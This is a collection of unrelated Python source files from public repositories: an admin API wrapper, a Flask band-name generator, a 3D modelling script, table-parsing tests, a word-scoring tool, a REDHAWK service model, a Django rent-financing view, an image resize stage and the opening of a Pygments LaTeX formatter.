# --- robinson96/GRAPE :: stashy/stashy/admin/groups.py ---
from ..helpers import ResourceBase, FilteredIterableResource
from ..errors import ok_or_error, response_or_error
from ..compat import update_doc
class Groups(ResourceBase, FilteredIterableResource):
@response_or_error
def add(self, group):
"""
Add a group, returns a dictionary containing the group name
"""
return self._client.post(self.url(), {}, params=dict(name=group))
@ok_or_error
def delete(self, group):
"""
Delete a group.
"""
return self._client.delete(self.url(), params=dict(name=group))
@ok_or_error
def add_user(self, group, user):
"""
Add a user to a group.
"""
return self._client.post(self.url("/add-user"), dict(context=group, itemName=user))
@ok_or_error
def remove_user(self, group, user):
"""
Remove a user from a group.
"""
return self._client.post(self.url("/remove-user"), dict(context=group, itemName=user))
def more_members(self, group, filter=None):
"""
Retrieves a list of users that are members of a specified group.
filter: return only users with usernames, display names or email addresses containing this string
"""
params = dict(context=group)
if filter:
params['filter'] = filter
return self.paginate("/more-members", params)
def more_non_members(self, group, filter=None):
"""
Retrieves a list of users that are not members of a specified group.
filter: return only users with usernames, display names or email addresses containing this string
"""
params = dict(context=group)
if filter:
params['filter'] = filter
return self.paginate("/more-non-members", params)
update_doc(Groups.all, """
Returns an iterator that will walk all the groups, paginating as necessary.
filter: if specified only group names containing the supplied string will be returned
""")
# --- J216/band_name_generator :: main.py ---
from flask import Flask, render_template
import datetime
from os import listdir
from os.path import isfile, join
import twitter as tw
import image_overlay as ilay
import band_name as bn
app = Flask(__name__)
app.debug = True
names_made=0
page_info = {}
page_info['business_name'] = u"Band Name Generator"
page_info['desciption'] = u"Get your band name generated here."
page_info['about'] = u"We make the band name for real."
page_info['phone'] = u"(900) 985-2781"
page_info['phone_link'] = u"+1"
page_info['address'] = u"Saint Joseph, MO"
page_info['email'] = u"[email protected]"
page_info['facebook'] = u"https://www.facebook.com/jared.haer"
page_info['twitter'] = u"https://twitter.com/jared216"
page_info['slides'] = [f for f in listdir('./static/images/band_names/') if isfile(join('./static/images/band_names/', f))]
page_info["moment"]=str(datetime.datetime.now())
@app.route("/")
def index():
page_info["moment"]=str(datetime.datetime.now())
return render_template("index.html",page_info=page_info)
@app.route("/band_name")
def bandName():
global names_made
page_info['band_name']=bn.getName()
bname=page_info['band_name']
p="./static/"
fn_out='images/band_names/'+str(names_made%12+1)+'.png'
print(ilay.makeImage(bname,fn_in='./bg.png',fn_out=p+fn_out))
page_info['band_image']=fn_out
names_made+=1
datetime.datetime.now()
# page_info['tweet_status']=tw.tweetImage(bn.getTweet(bname),ilay.makeImage(bname))
page_info['slides'] = [f for f in listdir('./static/images/band_names/') if isfile(join('./static/images/band_names/', f))]
return render_template("band_name.html", page_info=page_info)
if __name__ == "__main__":
app.run(host="0.0.0.0",port=5004)
# --- Zhibade/modo-tool-random-scale-rotate :: Scripts/RandomScaleAndRotate.py ---
#python
# Random scale & rotation tool
# Supports transforming individual mesh items from selection, or each polygon island within the mesh items
# Author: Jose Lopez Romo - Zhibade
import modo
import lx
import random
import sys  # needed by selection_check() and pivot_check() below
def query_user_value(user_value):
"""
Utility function for querying user values
"""
return lx.eval("user.value {0} ?".format(user_value))
SCALE_LIMITS_X = [query_user_value('zbRandScaleRot_scaleMinX'), query_user_value('zbRandScaleRot_scaleMaxX')]
SCALE_LIMITS_Y = [query_user_value('zbRandScaleRot_scaleMinY'), query_user_value('zbRandScaleRot_scaleMaxY')]
SCALE_LIMITS_Z = [query_user_value('zbRandScaleRot_scaleMinZ'), query_user_value('zbRandScaleRot_scaleMaxZ')]
SCALE_LIMITS_U = [query_user_value('zbRandScaleRot_scaleMinU'), query_user_value('zbRandScaleRot_scaleMaxU')]
ROT_LIMITS_X = [query_user_value('zbRandScaleRot_rotMinX'), query_user_value('zbRandScaleRot_rotMaxX')]
ROT_LIMITS_Y = [query_user_value('zbRandScaleRot_rotMinY'), query_user_value('zbRandScaleRot_rotMaxY')]
ROT_LIMITS_Z = [query_user_value('zbRandScaleRot_rotMinZ'), query_user_value('zbRandScaleRot_rotMaxZ')]
TRANSLATE_LIMITS_X = [query_user_value('zbRandScaleRot_translateMinX'), query_user_value('zbRandScaleRot_translateMaxX')]
TRANSLATE_LIMITS_Y = [query_user_value('zbRandScaleRot_translateMinY'), query_user_value('zbRandScaleRot_translateMaxY')]
TRANSLATE_LIMITS_Z = [query_user_value('zbRandScaleRot_translateMinZ'), query_user_value('zbRandScaleRot_translateMaxZ')]
APPLY_SCALE = query_user_value('zbRandScaleRot_scale')
APPLY_ROTATION = query_user_value('zbRandScaleRot_rotate')
APPLY_TRANSLATE = query_user_value('zbRandScaleRot_translate')
UNIFORM_SCALE = query_user_value('zbRandScaleRot_uniformScale')
POLYGON_ISLANDS = query_user_value('zbRandScaleRot_polyIslands')
PIVOT_POSITION = query_user_value('zbRandScaleRot_pivotPosition')
VALID_PIVOT_POSITIONS = ['Center', 'Top', 'Bottom', 'Left', 'Right', 'Front', 'Back']
def selection_check(selected_items):
"""
Checks current selection and stops the script if no mesh item is selected
"""
if not selected_items:
lx.eval("dialog.setup warning")
lx.eval("dialog.title Warning")
lx.eval("dialog.msg {No mesh items selected}")
lx.eval('dialog.result ok')
lx.eval('dialog.open')
sys.exit()
def pivot_check():
"""
Checks pivot position value and stops the script if it isn't valid
"""
if PIVOT_POSITION not in VALID_PIVOT_POSITIONS:
lx.eval("dialog.setup warning")
lx.eval("dialog.title Warning")
lx.eval("dialog.msg {Invalid pivot position}")
lx.eval('dialog.result ok')
lx.eval('dialog.open')
sys.exit()
def random_transform():
"""
Transforms the current selection randomly, as defined by the scale and rotation limits in the user values
"""
if APPLY_SCALE:
if UNIFORM_SCALE:
scale_u = random.uniform(SCALE_LIMITS_U[0], SCALE_LIMITS_U[1])
lx.eval("transform.channel scl.X {0}".format(scale_u))
lx.eval("transform.channel scl.Y {0}".format(scale_u))
lx.eval("transform.channel scl.Z {0}".format(scale_u))
else:
scale_x = random.uniform(SCALE_LIMITS_X[0], SCALE_LIMITS_X[1])
scale_y = random.uniform(SCALE_LIMITS_Y[0], SCALE_LIMITS_Y[1])
scale_z = random.uniform(SCALE_LIMITS_Z[0], SCALE_LIMITS_Z[1])
lx.eval("transform.channel scl.X {0}".format(scale_x))
lx.eval("transform.channel scl.Y {0}".format(scale_y))
lx.eval("transform.channel scl.Z {0}".format(scale_z))
if APPLY_ROTATION:
rot_x = random.uniform(ROT_LIMITS_X[0], ROT_LIMITS_X[1])
rot_y = random.uniform(ROT_LIMITS_Y[0], ROT_LIMITS_Y[1])
rot_z = random.uniform(ROT_LIMITS_Z[0], ROT_LIMITS_Z[1])
lx.eval("transform.channel rot.X {0}".format(rot_x))
lx.eval("transform.channel rot.Y {0}".format(rot_y))
lx.eval("transform.channel rot.Z {0}".format(rot_z))
if APPLY_TRANSLATE:
translate_x = random.uniform(TRANSLATE_LIMITS_X[0], TRANSLATE_LIMITS_X[1])
translate_y = random.uniform(TRANSLATE_LIMITS_Y[0], TRANSLATE_LIMITS_Y[1])
translate_z = random.uniform(TRANSLATE_LIMITS_Z[0], TRANSLATE_LIMITS_Z[1])
lx.eval("transform.channel pos.X {0}".format(translate_x))
lx.eval("transform.channel pos.Y {0}".format(translate_y))
lx.eval("transform.channel pos.Z {0}".format(translate_z))
def transform_polygon_islands():
"""
Takes all polygon islands inside the selected mesh items and transforms them randomly.
The pivot of the transformation depends on the user value set in the UI
"""
scene = modo.Scene()
mesh_items = scene.selectedByType('mesh')
selection_check(mesh_items)
for item in mesh_items:
scene.select(item)
geometry = item.geometry
# This mesh will be used to store polygon islands temporarily
final_mesh = scene.addMesh("zbFinalScaledMeshes")
all_polys = list(geometry.polygons)
# Scale all polygon islands and store them in the temporary mesh
while all_polys:
all_polys[0].select(True)
lx.eval("select.polygonConnect m3d false")
lx.eval("select.cut")
temp_mesh = scene.addMesh("zbTempScaleMesh")
scene.select(temp_mesh)
lx.eval("select.paste")
lx.eval("select.type item")
lx.eval("center.bbox {0}".format(PIVOT_POSITION.lower()))
random_transform()
lx.eval("select.cut")
scene.select(final_mesh)
lx.eval("select.paste")
scene.removeItems(temp_mesh)
scene.select(item)
all_polys = list(geometry.polygons)
# Cut all polygon islands back to the original mesh and clean scene
scene.select(final_mesh)
lx.eval("select.all")
lx.eval("select.cut")
scene.select(item)
lx.eval("select.paste")
scene.removeItems(final_mesh)
def transform_mesh_items():
"""
Takes all the selected mesh items and transforms them randomly.
"""
scene = modo.Scene()
mesh_items = scene.selectedByType('mesh')
selection_check(mesh_items)
for item in mesh_items:
scene.select(item)
random_transform()
if POLYGON_ISLANDS:
pivot_check()
transform_polygon_islands()
else:
transform_mesh_items()
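# --- Illustrative sketch (not part of the original file) ---
# Each channel above is sampled independently with random.uniform() between
# its min/max user values. Outside of modo that sampling step looks roughly
# like this (the limit values here are made-up assumptions):
#
#     import random
#     scale_limits_x = [0.8, 1.2]
#     rot_limits_y = [-45.0, 45.0]
#     scale_x = random.uniform(*scale_limits_x)   # e.g. 1.07
#     rot_y = random.uniform(*rot_limits_y)       # e.g. -12.3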
# --- AustereCuriosity/astropy :: astropy/io/ascii/tests/test_rst.py ---
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from ....extern.six.moves import cStringIO as StringIO
from ... import ascii
from .common import (assert_equal, assert_almost_equal,
setup_function, teardown_function)
def assert_equal_splitlines(arg1, arg2):
assert_equal(arg1.splitlines(), arg2.splitlines())
def test_read_normal():
"""Normal SimpleRST Table"""
table = """
# comment (with blank line above)
======= =========
Col1 Col2
======= =========
1.2 "hello"
2.4 's worlds
======= =========
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames, ['Col1', 'Col2'])
assert_almost_equal(dat[1][0], 2.4)
assert_equal(dat[0][1], '"hello"')
assert_equal(dat[1][1], "'s worlds")
def test_read_normal_names():
"""Normal SimpleRST Table with provided column names"""
table = """
# comment (with blank line above)
======= =========
Col1 Col2
======= =========
1.2 "hello"
2.4 's worlds
======= =========
"""
reader = ascii.get_reader(Reader=ascii.RST,
names=('name1', 'name2'))
dat = reader.read(table)
assert_equal(dat.colnames, ['name1', 'name2'])
assert_almost_equal(dat[1][0], 2.4)
def test_read_normal_names_include():
"""Normal SimpleRST Table with provided column names"""
table = """
# comment (with blank line above)
======= ========== ======
Col1 Col2 Col3
======= ========== ======
1.2 "hello" 3
2.4 's worlds 7
======= ========== ======
"""
reader = ascii.get_reader(Reader=ascii.RST,
names=('name1', 'name2', 'name3'),
include_names=('name1', 'name3'))
dat = reader.read(table)
assert_equal(dat.colnames, ['name1', 'name3'])
assert_almost_equal(dat[1][0], 2.4)
assert_equal(dat[0][1], 3)
def test_read_normal_exclude():
"""Nice, typical SimpleRST table with col name excluded"""
table = """
======= ==========
Col1 Col2
======= ==========
1.2 "hello"
2.4 's worlds
======= ==========
"""
reader = ascii.get_reader(Reader=ascii.RST,
exclude_names=('Col1',))
dat = reader.read(table)
assert_equal(dat.colnames, ['Col2'])
assert_equal(dat[1][0], "'s worlds")
def test_read_unbounded_right_column():
"""The right hand column should be allowed to overflow"""
table = """
# comment (with blank line above)
===== ===== ====
Col1 Col2 Col3
===== ===== ====
1.2 2 Hello
2.4 4 Worlds
===== ===== ====
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat[0][2], "Hello")
assert_equal(dat[1][2], "Worlds")
def test_read_unbounded_right_column_header():
"""The right hand column should be allowed to overflow"""
table = """
# comment (with blank line above)
===== ===== ====
Col1 Col2 Col3Long
===== ===== ====
1.2 2 Hello
2.4 4 Worlds
===== ===== ====
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames[-1], "Col3Long")
def test_read_right_indented_table():
"""We should be able to read right indented tables correctly"""
table = """
# comment (with blank line above)
==== ==== ====
Col1 Col2 Col3
==== ==== ====
3 3.4 foo
1 4.5 bar
==== ==== ====
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames, ["Col1", "Col2", "Col3"])
assert_equal(dat[0][2], "foo")
assert_equal(dat[1][0], 1)
def test_trailing_spaces_in_row_definition():
""" Trailing spaces in the row definition column shouldn't matter"""
table = """
# comment (with blank line above)
==== ==== ====
Col1 Col2 Col3
==== ==== ====
3 3.4 foo
1 4.5 bar
==== ==== ====
""" # noqa
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames, ["Col1", "Col2", "Col3"])
assert_equal(dat[0][2], "foo")
assert_equal(dat[1][0], 1)
table = """\
====== =========== ============ ===========
Col1 Col2 Col3 Col4
====== =========== ============ ===========
1.2 "hello" 1 a
2.4 's worlds 2 2
====== =========== ============ ===========
"""
dat = ascii.read(table, Reader=ascii.RST)
def test_write_normal():
"""Write a table as a normal SimpleRST Table"""
out = StringIO()
ascii.write(dat, out, Writer=ascii.RST)
assert_equal_splitlines(out.getvalue(), """\
==== ========= ==== ====
Col1 Col2 Col3 Col4
==== ========= ==== ====
1.2 "hello" 1 a
2.4 's worlds 2 2
==== ========= ==== ====
""")
# --- hchiam/cognateLanguage :: miniExamples/gerPorPol/evaluate.py ---
from collections import OrderedDict
from levenshteinDistance import levenshtein as ld
#------------------------
# shared variables:
#------------------------
words = OrderedDict()
words['Eng'] = ''
words['Ger'] = ''
words['Por'] = ''
words['Pol'] = ''
outputFilename = 'output.txt'
allophones = {
'aeiou' : 'a',
'bp' : 'b',
'cjsz' : 'z',
'dt' : 'd',
'fv' : 'v',
'gkq' : 'g',
'hx' : 'h',
'lr' : 'l',
'mn' : 'm',
'w' : 'w',
'y' : 'y'
}
#------------------------
# functions:
#------------------------
def respellWithInitialVowelAndConsonants(word):
for char in word[1:]:
if char in 'aeiou':
word = word[0] + word[1:].replace(char,'')
return word
def respellWithAllophones(word):
for char in word:
for allo in allophones:
if char in allo:
word = word.replace(char,allophones[allo])
return word
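# Worked example (added for illustration): with the allophone table above,
# respellWithAllophones("katze") -> "gadza" ('k'->'g', 't'->'d', 'e'->'a'),
# and respellWithInitialVowelAndConsonants("house") -> "hs" (the initial
# letter is kept, vowels after it are stripped).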
def combineOverlappingWords(shortList):
for language in shortList:
for otherlanguage in shortList:
if language != otherlanguage and language != 'Eng' and otherlanguage != 'Eng':
a = shortList[language]
b = shortList[otherlanguage]
for i in range(1, len(b)):
if a.endswith(b[:i]):
shortList[otherlanguage] = ''
shortList[language] = a+b[i:]
return shortList
def evaluateScore_Levenshtein(word,originalWords):
score = 0
score_maximize = 100 # just to keep score positive
score_minimize = 0
for lang in originalWords:
score_minimize += ld(word,lang)
score = score_maximize - score_minimize
return score
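# Worked example (added for illustration): for word="hs" and
# originalWords=["haus", "house"], ld("hs", "haus") == 2 and
# ld("hs", "house") == 3, so the score is 100 - (2 + 3) = 95.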
def evaluateScore_AlloWithVowels(word,originalWords):
score = 0
scoreLangs = [0] * len(originalWords)
leastEfficientWord = ''.join(originalWords)
# ABZDAVG allo w/ vowels
alloWithVowels = respellWithAllophones(word)
#print 'Allophone Form of Word, with Vowels: ', alloWithVowels
alloOriginalWords = list(originalWords) # careful with creating references that overwrite!
for index, srcWord in enumerate(alloOriginalWords):
alloOriginalWords[index] = respellWithAllophones(srcWord)
#print alloOriginalWords
# get preliminary scores for each language:
for lang, srcWordAllo in enumerate(alloOriginalWords):
for i in range(len(srcWordAllo)):
head = srcWordAllo[:i]
if head in respellWithAllophones(word):
# add to score per matching letter of word:
scoreLangs[lang] += 1
# adjust language scores by number of characters in original words:
for lang, srcWordAllo in enumerate(alloOriginalWords):
scoreLangs[lang] -= len(srcWordAllo)
# language scores are weighted in reverse order
scoreLangs.reverse()
for wt, lang in enumerate(scoreLangs):
score += lang + lang * ((wt+1)/10.0) # make weightings like these to make gradient of influence: 0.1, 0.2, 0.3, 0.4, 0.5
#print 'language score contribution: ', score
# get preliminary score for word length:
scoreLen = (len(leastEfficientWord) - len(word)) # score increases with shorter word
scoreLen *= 1.1 # this is the weighting for length score
#print 'word length contribution', scoreLen
score += scoreLen
return round(score,2)
def evaluateScore_ConsonantsInOrder(word,originalWords):
score = 0
scoreLangs = [0] * len(originalWords)
leastEfficientWord = ''.join(originalWords)
alloConsonants = list(originalWords) # careful with creating references that overwrite!
alloOfNewWord = respellWithAllophones(word).replace('a','').replace('e','').replace('i','').replace('o','').replace('u','')
#print alloOfNewWord
for index, srcWord in enumerate(alloConsonants):
alloConsonants[index] = respellWithAllophones(srcWord).replace('a','').replace('e','').replace('i','').replace('o','').replace('u','')
#print alloConsonants
# BZDVG
# go through each language's test pattern:
for lang, testPattern in enumerate(alloConsonants):
currentLetterPos = 0
# go through as many letters of that test pattern as possible:
for i in range(1,len(testPattern)):
# if that letter is found in new word then update current letter position (= index+1 since list indices start at 0):
if testPattern[i] in alloOfNewWord:
#print testPattern[i]
currentLetterPos = i+1
# use full word length - the current letter into the test pattern as the score for that language
scoreLangs[lang] = currentLetterPos - len(originalWords[lang])
currentLetterPos = 0
#print scoreLangs
# language scores are weighted in reverse order
scoreLangs.reverse()
for wt, lang in enumerate(scoreLangs):
score += lang + lang * ((wt+1)/10.0) # make weightings like these to make gradient of influence: 0.1, 0.2, 0.3, 0.4, 0.5
# get preliminary score for word length:
scoreLen = (len(leastEfficientWord) - len(word)) # score increases with shorter word
scoreLen *= 1.1 # this is the weighting for length score
#print 'word length contribution', scoreLen
score += scoreLen
return round(score,2)
def evaluateScore_LettersFromEachSource(word,originalWords):
score = 0
for letter in word:
for srcWord in originalWords:
# encourage using words with letters found in all source words
score += 1 if letter in srcWord else 0
return score
def penalizeRepeatedLetterSequences(word):
score = 0
currentLetter = ''
for letter in word:
if letter == currentLetter:
score -= 1
else:
currentLetter = letter
return score
def penalizeLength(word):
score = -len(word)
return score
def penalizeZeroLetters(word):
if word == '':
return -1
return 0
def penalizeNoVowels(word):
score = 0
vowels = 'aeiou'
has = False
for vowel in vowels:
if vowel in word:
score = 1
return score
if len(word) > 1: # don't force a vowel if the word is only 1-letter long
score = -1
return score
def penalizeInstructionComplexity(instruction): # TODO
score = 0
return score
def evaluate(line):
newWord = line.split(',')[0]
originalWords = line.split(',')[2:]
score = 0
score += evaluateScore_AlloWithVowels(newWord, originalWords)
score += evaluateScore_ConsonantsInOrder(newWord, originalWords)
score -= evaluateScore_Levenshtein(newWord, originalWords)
score += evaluateScore_LettersFromEachSource(newWord, originalWords)
score += penalizeRepeatedLetterSequences(newWord)
score += penalizeLength(newWord)
score += penalizeZeroLetters(newWord)
score += penalizeNoVowels(newWord)
# score += penalizeInstructionComplexity(instruction) # TODO
return round(score, 2)
#------------------------
# main part of the program:
#------------------------
# get lines of file into a list:
with open(outputFilename,'r') as f1:
data = f1.readlines()
# fill arrays:
for line in data:
if ',' in line:
print(evaluate(line))
# --- RedhawkSDR/rest-python :: model/redhawk.py ---
#
# This file is protected by Copyright. Please refer to the COPYRIGHT file
# distributed with this source distribution.
#
# This file is part of REDHAWK rest-python.
#
# REDHAWK rest-python is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# REDHAWK rest-python is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
"""
redhawk.py
Asynchronous Tornado service for REDHAWK. Maps the functions
in domain.py and caches the domain object.
"""
from _utils.tasking import background_task
from domain import Domain, scan_domains, ResourceNotFound
class Redhawk(object):
__domains = {}
def _get_domain(self, domain_name):
name = str(domain_name)
if not name in self.__domains:
self.__domains[name] = Domain(domain_name)
return self.__domains[name]
##############################
# DOMAIN
@background_task
def get_domain_list(self):
return scan_domains()
@background_task
def get_domain_info(self, domain_name):
dom = self._get_domain(domain_name)
return dom.get_domain_info()
@background_task
def get_domain_properties(self, domain_name):
dom = self._get_domain(domain_name)
return dom.properties()
##############################
# APPLICATION
@background_task
def get_application(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.find_app(app_id)
@background_task
def get_application_list(self, domain_name):
dom = self._get_domain(domain_name)
return dom.apps()
@background_task
def get_available_applications(self, domain_name):
dom = self._get_domain(domain_name)
return dom.available_apps()
@background_task
def launch_application(self, domain_name, app_name):
dom = self._get_domain(domain_name)
return dom.launch(app_name)
@background_task
def release_application(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.release(app_id)
##############################
# COMPONENT
@background_task
def get_component(self, domain_name, app_id, comp_id):
dom = self._get_domain(domain_name)
return dom.find_component(app_id, comp_id)
@background_task
def get_component_list(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.components(app_id)
@background_task
def component_configure(self, domain_name, app_id, comp_id, new_properties):
dom = self._get_domain(domain_name)
comp = dom.find_component(app_id, comp_id)
configure_changes = {}
for prop in comp._properties:
if prop.id in new_properties:
if new_properties[prop.id] != prop.queryValue():
configure_changes[prop.id] = (type(prop.queryValue()))(new_properties[prop.id])
return comp.configure(configure_changes)
##############################
# DEVICE MANAGER
@background_task
def get_device_manager(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.find_device_manager(device_manager_id)
@background_task
def get_device_manager_list(self, domain_name):
dom = self._get_domain(domain_name)
return dom.device_managers()
##############################
# DEVICE
@background_task
def get_device_list(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.devices(device_manager_id)
@background_task
def get_device(self, domain_name, device_manager_id, device_id):
dom = self._get_domain(domain_name)
return dom.find_device(device_manager_id, device_id)
##############################
# SERVICE
@background_task
def get_service_list(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.services(device_manager_id)
##############################
# GENERIC
@background_task
def get_object_by_path(self, path, path_type):
'''
Locates a redhawk object with the given path, and path type.
Returns the object + remaining path:
comp, opath = locate(ipath, 'component')
Valid path types are:
'application' - [ domain id, application-id ]
'component' - [ domain id, application-id, component-id ]
'device-mgr' - [ domain id, device-manager-id ]
'device' - [ domain id, device-manager-id, device-id ]
'''
domain = self._get_domain(path[0])
if path_type == 'application':
return domain.find_app(path[1]), path[2:]
elif path_type == 'component':
return domain.find_component(path[1], path[2]), path[3:]
elif path_type == 'device-mgr':
return domain.find_device_manager(path[1]), path[2:]
elif path_type == 'device':
return domain.find_device(path[1], path[2]), path[3:]
raise ValueError("Bad path type %s. Must be one of application, component, device-mgr or device" % path_type)
# --- verpoorten/immobilier :: main/financement.py ---
##############################################################################
#
# Immobilier it's an application
# designed to manage the core business of property management, buildings,
# rental agreement and so on.
#
# Copyright (C) 2016-2018 Verpoorten Leïla
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.shortcuts import render, redirect
from datetime import datetime
from main import models as mdl
from dateutil.relativedelta import relativedelta
def new(request, location_id):
location = mdl.contrat_location.find_by_id(location_id)
# Find the most recent financing record
financement_list = mdl.financement_location.find_by_location(location_id).order_by('date_debut')
financement_dernier = financement_list.last()
nouveau_financement = None
financement = None
if financement_list:
financement = financement_list[0]
# duplicate it
nouveau_financement = mdl.financement_location.FinancementLocation()
nouveau_financement.date_debut = financement_dernier.date_debut
nouveau_financement.date_fin = financement_dernier.date_fin
nouveau_financement.loyer = financement_dernier.loyer
nouveau_financement.charges = financement_dernier.charges
nouveau_financement.index = financement_dernier.index
return render(request, "financementlocation_new.html",
{'old_financement': financement,
'nouveau_financement': nouveau_financement,
'id_location': location.id,
'prev': request.GET.get('prev', None),
'previous': 'location'})
def create(request):
location = mdl.contrat_location.find_by_id(request.POST['id'])
if request.POST.get('cancel_financement_loc_new', None):
previous = request.POST.get('previous', None)
if previous == 'location':
return render(request, "contratlocation_update.html",
{'location': location})
else:
prev = request.POST.get('prev', None)
# TODO: fetch the new financing record, adjust the old one and save everything to the DB
# adjust the current financing record
financement_courant = location.dernier_financement
financement_list = mdl.financement_location.find_by_location(location.id).order_by('date_debut')
financement_dernier = financement_list.last()
date_fin_initiale = location.date_fin
nouvelle_date_fin_financement_courant = modifer_date_fin_financement_courant(financement_courant, request)
nouveau_financement = nouveau_financement_depuis_precedant(date_fin_initiale, location,
nouvelle_date_fin_financement_courant, request)
# the existing follow-up records must be updated
suivis_existant = mdl.suivi_loyer.find(financement_courant, nouveau_financement.date_debut, 'A_VERIFIER')
for s in suivis_existant:
s.financement_location = nouveau_financement
s.remarque = 'Indexé'
s.save()
financement_courant = mdl.financement_location.find_by_id(location.financement_courant.id)
if prev == 'fl' or previous == 'location':
return render(request, "contratlocation_update.html",
{'location': location})
return redirect('/contratlocations/')
def nouveau_financement_depuis_precedant(date_fin_initiale, location, nouvelle_date_fin_financement_courant, request):
# create the new financing record
nouveau_financement = mdl.financement_location.FinancementLocation()
nouveau_financement.date_debut = nouvelle_date_fin_financement_courant + relativedelta(days=1)
nouveau_financement.date_fin = date_fin_initiale # assume the end date does not change
nouveau_financement.loyer = 0
if request.POST.get('loyer', None):
nouveau_financement.loyer = float(request.POST['loyer'].replace(',', '.'))
nouveau_financement.charges = 0
if request.POST.get('charges', None):
nouveau_financement.charges = float(request.POST['charges'].replace(',', '.'))
nouveau_financement.index = 0
if request.POST.get('index', None):
nouveau_financement.index = float(request.POST['index'].replace(',', '.'))
nouveau_financement.contrat_location = location
nouveau_financement.save()
return nouveau_financement
def modifer_date_fin_financement_courant(financement_courant, request,):
nouvelle_date_de_fin = None
if request.POST['date_debut']:
nouvelle_date_de_fin = datetime.strptime(request.POST['date_debut'], '%d/%m/%Y')
nouvelle_date_de_fin = nouvelle_date_de_fin - relativedelta(days=1)
financement_courant.date_fin = nouvelle_date_de_fin
financement_courant.save()
return nouvelle_date_de_fin
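# Worked example (added for illustration): the "new start minus one day"
# arithmetic above relies on dateutil, e.g.
#     datetime(2018, 5, 1) - relativedelta(days=1) == datetime(2018, 4, 30)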
# --- nickpascucci/RobotCamera :: src/driver/modules/pipelines/resizepipe.py ---
"""An image processing pipeline stage which resizes images.
Using this pipe negates the need for setting resolution directly on the camera,
while still allowing for tuning of the received images. If you encounter a
problem with "Inappropriate IOCTL for device", you might consider using the
default camera resolution and resizing images as needed afterwards."""
import cv
__author__ = "Nick Pascucci ([email protected])"
class ResizePipe:
def __init__(self, next_pipe, x_res=640, y_res=480):
self.next_pipe = next_pipe
self.x_res = x_res
self.y_res = y_res
def process(self, image):
if image.width == self.x_res and image.height == self.y_res:
return image
# Resizing tries to fit the original image into the new destination
# image exactly, so if they don't scale well to each other there may be
# distortion.
if ((image.width % self.x_res != 0 and self.x_res % image.width != 0) or
(image.height % self.y_res != 0 and self.y_res % image.height != 0)):
print ("WARNING: Resize target size does not fit cleanly into "
" original. Distortion of the image may occur.")
print "\tOriginal size: %sx%s" % (image.width, image.height)
print "\tTarget size: %sx%s" % (self.x_res, self.y_res)
# We first create a destination image of the proper size,
# and then call resize() with it to resize the image.
# cv.CreateMat is kind of weird since it takes rows then columns as
# arguments rather than the usual (x, y) ordering.
if type(image) == cv.iplimage:
resized_image = cv.CreateImage((self.x_res, self.y_res),
image.depth, image.nChannels)
else:
resized_image = cv.CreateMat(self.y_res, self.x_res, image.type)
cv.Resize(image, resized_image)
if self.next_pipe:
processed_image = self.next_pipe.process(resized_image)
return processed_image
else:
return resized_image
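# --- Illustrative usage (not part of the original file) ---
# A minimal sketch assuming OpenCV's legacy `cv` bindings (as imported above);
# the image path is a placeholder.
#
#     pipe = ResizePipe(None, x_res=320, y_res=240)
#     img = cv.LoadImage("frame.png")
#     small = pipe.process(img)   # returns a 320x240 IplImage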
# --- fusion809/fusion809.github.io-old :: vendor/bundle/ruby/2.2.0/gems/pygments.rb-0.6.3/vendor/pygments-main/pygments/formatters/latex.py ---
# -*- coding: utf-8 -*-
"""
pygments.formatters.latex
~~~~~~~~~~~~~~~~~~~~~~~~~
Formatter for LaTeX fancyvrb output.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import division
from pygments.formatter import Formatter
from pygments.lexer import Lexer
from pygments.token import Token, STANDARD_TYPES
from pygments.util import get_bool_opt, get_int_opt, StringIO, xrange, \
iteritems
__all__ = ['LatexFormatter']
def escape_tex(text, commandprefix):
return text.replace('\\', '\x00'). \
replace('{', '\x01'). \
replace('}', '\x02'). \
replace('\x00', r'\%sZbs{}' % commandprefix). \
replace('\x01', r'\%sZob{}' % commandprefix). \
replace('\x02', r'\%sZcb{}' % commandprefix). \
replace('^', r'\%sZca{}' % commandprefix). \
replace('_', r'\%sZus{}' % commandprefix). \
replace('&', r'\%sZam{}' % commandprefix). \
replace('<', r'\%sZlt{}' % commandprefix). \
replace('>', r'\%sZgt{}' % commandprefix). \
replace('#', r'\%sZsh{}' % commandprefix). \
replace('%', r'\%sZpc{}' % commandprefix). \
replace('$', r'\%sZdl{}' % commandprefix). \
replace('-', r'\%sZhy{}' % commandprefix). \
replace("'", r'\%sZsq{}' % commandprefix). \
replace('"', r'\%sZdq{}' % commandprefix). \
replace('~', r'\%sZti{}' % commandprefix)
DOC_TEMPLATE = r'''
\documentclass{%(docclass)s}
\usepackage{fancyvrb}
\usepackage{color}
\usepackage[%(encoding)s]{inputenc}
%(preamble)s
%(styledefs)s
\begin{document}
\section*{%(title)s}
%(code)s
\end{document}
'''
